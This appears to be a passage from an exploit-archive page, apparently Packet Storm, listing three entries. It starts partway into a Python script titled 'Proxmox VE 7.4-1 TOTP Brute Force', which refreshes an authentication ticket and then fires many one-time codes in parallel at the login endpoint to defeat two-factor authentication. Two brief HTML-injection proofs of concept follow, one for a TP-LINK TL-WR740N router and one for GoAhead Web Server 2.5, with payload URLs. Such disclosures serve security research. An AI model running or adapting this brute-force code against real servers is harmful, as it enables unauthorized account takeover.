"1"}    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)    ticket_data = json.loads(ticket_data_raw)    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]    ticket_username = ticket_data["data"]["username"]def attack(token):    global last_refresh_time    global auto_refresh_time    global target_url    global username    global password    global ticket_username    global ticket_data    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):        refresh_ticket(target_url, username, password)        last_refresh_time = int(time.time())    url = target_url + "/api2/extjs/access/ticket"    cookies = {}    headers = {"Csrfpreventiontoken": CSRFPreventionToken}    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)    if(len(response.text) > 350):        print(response.text)        os._exit(1)while(1):    refresh_ticket(target_url, username, password)    last_refresh_time = int(time.time())    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:        res = [executor.submit(attack, token) for token in tokens]        concurrent.futures.wait(res)

Proxmox VE 7.4-1 TOTP Brute Force

TP-LINK TL-WR740N suffers from an html injection vulnerability.

    # Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities# Date: 25/9/2023# Exploit Author: Shujaat Amin (ZEROXINN)# Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: Windows 10---------------------------POC-----------------------------1) Go to your routers IP (192.168.0.1)2) Go to Access control --> Target,rule3) Click on add new 5) Type <h1>Hello<h1> in Target Description box6) Click on Save, and now you can see html injection on the webpage

TP-LINK TL-WR740N HTML Injection

GoAhead Web Server version 2.5 suffers from an html injection vulnerability.

    # Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities# Date: 25/9/2023# Exploit Author: Syed Affan Ahmed (ZEROXINN)# Vendor Homepage: https://www.embedthis.com/goahead/# Affected Version: 2.5 may be others.# Tested On Version: 2.5 in ZTE AC3630---------------------------POC---------------------------GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.HTML Injection can cause the ability to execute within the context of that site.http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>

Source

Packet Storm